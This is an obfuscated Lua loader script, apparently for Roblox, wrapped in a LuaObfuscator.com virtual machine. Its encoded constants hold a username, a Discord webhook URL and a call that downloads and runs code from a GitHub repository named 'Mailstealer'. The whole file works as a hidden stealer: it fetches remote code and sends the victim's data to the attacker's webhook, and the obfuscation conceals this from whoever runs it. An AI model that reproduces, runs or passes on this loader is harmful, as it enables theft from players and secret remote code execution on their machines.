--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then function v25() local v31=v24();local v32=v24();local v33=2 -1 ;local v34=(v21(v32,2 -1 ,38 -18 ) * ((4 -2)^((768 -(32 + 85)) -(555 + 64)))) + v31 ;local v35=v21(v32,952 -(857 + 74) ,599 -(367 + 201) );local v36=((v21(v32,32)==1) and  -(928 -(214 + 713))) or (1 + 0) ;if (v35==0) then if (v34==0) then return v36 * (0 + 0) ;else v35=878 -(277 + 5 + 595) ;v33=(364 + 1273) -(1523 + 114) ;end elseif (v35==(1840 + 207)) then return ((v34==(0 -0)) and (v36 * (((2023 -(892 + 65)) -(68 + 997))/0))) or (v36 * NaN) ;end return v8(v36,v35-(2293 -((538 -312) + 1044)) ) * (v33 + (v34/((8 -6)^52))) ;end v26=nil;function v26(v37) local v38;if  not v37 then v37=v24();if (v37==(0 -0)) then return "";end end v38=v3(v16,v19,(v19 + v37) -(1 -0) );v19=v19 + v37 ;local v39={};for v65=351 -(87 + 263) , #v38 do v39[v65]=v2(v1(v3(v38,v65,v65)));end return v6(v39);end v18=5;end if (v18==7) then function v30(v40,v41,v42) local v43=v40[1];local v44=v40[2];local v45=v40[3];return function(...) local v67=v43;local v68=v44;local v69=v45;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v82=0,v75 do if (v82>=v69) then v73[v82-v69 ]=v74[v82 + 1 ];else v77[v82]=v74[v82 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=8) then if (v80<=3) then if (v80<=1) then if (v80==0) then v77[v79[2]]=v79[3]~=0 ;else local v104=v79[2];v77[v104]=v77[v104](v13(v77,v104 + 1 ,v72));end elseif (v80==2) then v77[v79[2]]=v79[3];else v42[v79[3]]=v77[v79[2]];end elseif (v80<=5) then if (v80>4) then local v110=0;local v111;local v112;while true do if (v110==0) then v111=v79[2];v112=v77[v79[3]];v110=1;end if (v110==1) then v77[v111 + 1 ]=v112;v77[v111]=v112[v79[4]];break;end end else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=6) then v77[v79[2]]();elseif (v80==7) then local v143=0;local v144;while true do if (v143==0) then v144=v79[2];v77[v144]=v77[v144](v13(v77,v144 + 1 ,v72));break;end end else do return;end end elseif (v80<=12) then if (v80<=10) then if (v80==9) then local v114=v79[2];local v115,v116=v70(v77[v114](v13(v77,v114 + 1 ,v79[3])));v72=(v116 + v114) -1 ;local v117=0;for v141=v114,v72 do local v142=0;while true do if (v142==0) then v117=v117 + 1 ;v77[v141]=v115[v117];break;end end end else v42[v79[3]]=v77[v79[2]];end elseif (v80==11) then local v120=v79[2];local v121=v77[v79[3]];v77[v120 + 1 ]=v121;v77[v120]=v121[v79[4]];else do return;end end elseif (v80<=14) then if (v80==13) then v77[v79[2]]();else v77[v79[2]]=v79[3];end elseif (v80<=15) then v77[v79[2]]=v42[v79[3]];elseif (v80>16) then local v145=0;local v146;local v147;local v148;local v149;while true do if (v145==0) then v146=v79[2];v147,v148=v70(v77[v146](v13(v77,v146 + 1 ,v79[3])));v145=1;end if (1==v145) then v72=(v148 + v146) -1 ;v149=0;v145=2;end if (v145==2) then for v162=v146,v72 do local v163=0;while true do if (v163==0) then v149=v149 + 1 ;v77[v162]=v147[v149];break;end end end break;end end else v77[v79[2]]=v42[v79[3]];end v71=v71 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==3) then v24=nil;function v24() local v46,v47,v48,v49=v1(v16,v19,v19 + 3 );v19=v19 + (184 -(67 + 113)) ;return (v49 * (12302277 + 4474939)) + (v48 * (160901 -95365)) + (v47 * ((751 -562) + 67)) + v46 ;end v25=nil;v18=4;end if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v50,v51,v52) if v52 then local v85=(v50/((954 -(345 + 457 + 150))^(v51-(2 -1))))%((3 -1)^(((v52-1) -(v51-(1 + 0))) + (998 -(915 + 82)))) ;return v85-(v85%(1 + 0)) ;else local v86=0 -0 ;local v87;while true do if (v86==(0 -0)) then v87=(2 + (0 -0))^(v51-(1 -0)) ;return (((v50%(v87 + v87))>=v87) and (443 -((854 -(145 + 293)) + 26))) or (1187 -(1069 + 118)) ;end end end end v22=nil;v18=2;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53) if (v1(v53,2)==79) then local v88=0;while true do if (v88==0) then v20=v0(v3(v53,1,1));return "";end end else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v53,16));if v20 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v90,v20);v20=nil;v98=1;end end else return v90;end break;end end end end);v18=1;end if (v18==2) then function v22() local v54=0;local v55;while true do if (v54==(430 -(44 + 386))) then v55=v1(v16,v19,v19);v19=v19 + (1487 -(998 + (1260 -(201 + 571)))) ;v54=1 + 0 ;end if (v54==(1 + 0)) then return v55;end end end v23=nil;function v23() local v56,v57=v1(v16,v19,v19 + 2 );v19=v19 + (1140 -(116 + 1022)) ;return (v57 * (1065 -809)) + v56 ;end v18=3;end if (v18==6) then v29=nil;function v29() local v58=0;local v59;local v60;local v61;local v62;local v63;local v64;while true do local v81=0 -0 ;while true do if (v81==0) then if (v58==(1000 -(451 + 549))) then local v95=0 + 0 ;while true do if (v95==(0 -0)) then v59={};v60={};v95=1;end if (v95~=1) then else v61={};v58=1;break;end end end if (v58==2) then local v96=0;while true do if (v96==(1 -0)) then for v129=1385 -(746 + 638) ,v24() do local v130=0 + 0 ;local v131;local v132;local v133;while true do if (v130==(0 -0)) then v131=341 -(218 + 123) ;v132=nil;v130=1582 -(1535 + 46) ;end if (v130~=1) then else v133=nil;while true do if (v131==(0 + 0)) then local v164=0 + 0 ;local v165;while true do if (v164~=(560 -(306 + 254))) then else v165=0 + 0 ;while true do if ((0 -0)~=v165) then else v132=1467 -(899 + 568) ;v133=nil;v165=1;end if (v165~=1) then else v131=1 + 0 ;break;end end break;end end end if (v131==1) then while true do if (v132==0) then v133=v22();if (v21(v133,2 -1 ,1)==(603 -(268 + 335))) then local v169=0;local v170;local v171;local v172;local v173;local v174;while true do if (v169==2) then v174=nil;while true do if (v170==1) then local v180=0;while true do if ((291 -(60 + 230))==v180) then v170=2;break;end if (v180~=0) then else v173=nil;v174=nil;v180=573 -(426 + 146) ;end end end if ((0 + 0)==v170) then local v181=0;local v182;while true do if (v181~=(1456 -(282 + 1174))) then else v182=811 -(569 + 242) ;while true do if (v182==(0 -0)) then v171=0;v172=nil;v182=1;end if (v182~=1) then else v170=1;break;end end break;end end end if ((1 + 1)~=v170) then else while true do if (v171==1) then local v183=0;while true do if (v183~=1) then else v171=2;break;end if (v183~=(1024 -(706 + 318))) then else local v190=0;local v191;while true do if ((1251 -(721 + 530))==v190) then v191=0;while true do if (v191==1) then v183=1;break;end if (v191==0) then v174={v23(),v23(),nil,nil};if (v172==(0 -0)) then local v194=0 + 0 ;local v195;local v196;while true do if ((701 -(271 + 429))~=v194) then else while true do if (v195~=0) then else v196=0;while true do if (v196~=(0 + 0)) then else v174[3]=v23();v174[1504 -(1408 + 92) ]=v23();break;end end break;end end break;end if (v194==0) then v195=1086 -(461 + 625) ;v196=nil;v194=1289 -(993 + 295) ;end end elseif (v172==(1 + 0)) then v174[3]=v24();elseif (v172==2) then v174[3]=v24() -((1173 -(418 + 753))^16) ;elseif (v172==(2 + 1)) then local v203=0;local v204;local v205;while true do if (v203~=1) then else while true do if (v204==(0 + 0)) then v205=0 + 0 ;while true do if (v205==(0 + 0)) then v174[532 -(406 + 123) ]=v24() -(2^(1785 -(1749 + 20))) ;v174[4]=v23();break;end end break;end end break;end if (v203==(0 + 0)) then v204=1322 -(1249 + 73) ;v205=nil;v203=1;end end end v191=1;end end break;end end end end end if (v171==(2 + 1)) then if (v21(v173,3,3)==(1146 -(466 + 679))) then v174[9 -5 ]=v64[v174[11 -7 ]];end v59[v129]=v174;break;end if (v171==(1900 -(106 + 1794))) then local v185=0 + 0 ;while true do if (v185~=(1 + 0)) then else v171=2 -1 ;break;end if (v185~=0) then else local v192=0 -0 ;while true do if (v192~=0) then else v172=v21(v133,2,3);v173=v21(v133,118 -(4 + 110) ,590 -(57 + 527) );v192=1428 -(41 + 1386) ;end if (v192==(104 -(17 + 86))) then v185=1;break;end end end end end if (v171==2) then local v186=0 + 0 ;local v187;while true do if (v186~=(0 -0)) then else v187=0;while true do if (v187==(0 -0)) then local v193=166 -(122 + 44) ;while true do if (v193==1) then v187=1;break;end if (v193==(0 -0)) then if (v21(v173,3 -2 ,1 + 0 )==1) then v174[1 + 1 ]=v64[v174[2]];end if (v21(v173,2,3 -1 )==(66 -(30 + 35))) then v174[3 + 0 ]=v64[v174[1260 -(1043 + 214) ]];end v193=1;end end end if ((3 -2)~=v187) then else v171=1215 -(323 + 889) ;break;end end break;end end end end break;end end break;end if (v169~=(2 -1)) then else v172=nil;v173=nil;v169=582 -(361 + 219) ;end if (0~=v169) then else local v179=320 -(53 + 267) ;while true do if (v179==(1 + 0)) then v169=1;break;end if (v179~=(413 -(15 + 398))) then else v170=982 -(18 + 964) ;v171=nil;v179=1;end end end end end break;end end break;end end break;end end end v58=3;break;end if (v96==(0 -0)) then for v134=1,v63 do local v135=0 + 0 ;local v136;local v137;local v138;local v139;local v140;while true do if (v135==2) then v140=nil;while true do if (v136~=(2 + 0)) then else while true do if (v137~=0) then else v138=850 -(20 + 830) ;v139=nil;v137=1 + 0 ;end if (v137~=1) then else v140=nil;while true do if (v138==1) then if (v139==1) then v140=v22()~=0 ;elseif (v139==2) then v140=v25();elseif (v139~=(129 -(116 + 10))) then else v140=v26();end v64[v134]=v140;break;end if (v138==0) then local v176=0 + 0 ;local v177;local v178;while true do if (v176~=(738 -(542 + 196))) then else v177=0 -0 ;v178=nil;v176=1;end if (v176==(1 + 0)) then while true do if (v177~=(0 + 0)) then else v178=0;while true do if (v178==1) then v138=1;break;end if (v178~=(0 + 0)) then else v139=v22();v140=nil;v178=2 -1 ;end end break;end end break;end end end end break;end end break;end if (v136~=1) then else local v166=0 -0 ;while true do if (v166~=(1551 -(1126 + 425))) then else v139=nil;v140=nil;v166=406 -(118 + 287) ;end if (v166==1) then v136=2;break;end end end if (v136~=0) then else v137=0 -0 ;v138=nil;v136=1;end end break;end if (v135==1) then v138=nil;v139=nil;v135=2;end if (v135~=0) then else v136=0;v137=nil;v135=1122 -(118 + 1003) ;end end end v62[8 -5 ]=v22();v96=378 -(142 + 235) ;end end end v81=4 -3 ;end if (v81==1) then if (3==v58) then for v100=1 + 0 ,v24() do v60[v100-1 ]=v29();end return v62;end if ((978 -(553 + 424))~=v58) then else local v97=0;while true do if (v97==1) then v64={};v58=3 -1 ;break;end if (v97==(0 + 0)) then v62={v59,v60,nil,v61};v63=v24();v97=1;end end end break;end end end end v30=nil;v18=7;end end end return v15("LOL!093O0003083O00557365726E616D65030A3O00702O6F7063617436353303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132333430352O342O38312O323139363032302F5268595362657767452D51616C5A667A37486A664A4E2D6D36456E4150705861747166493753764B315F7930454247643448387142784752456C77657354512D7943384D030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F7632000E3O00120E3O00023O0012033O00013O00120E3O00043O0012033O00034O00043O00013O0012033O00053O00120F3O00063O00120F000100073O00200B00010001000800120E000300094O0011000100034O00075O00022O000D3O000100012O000C3O00017O00",v9(),...);
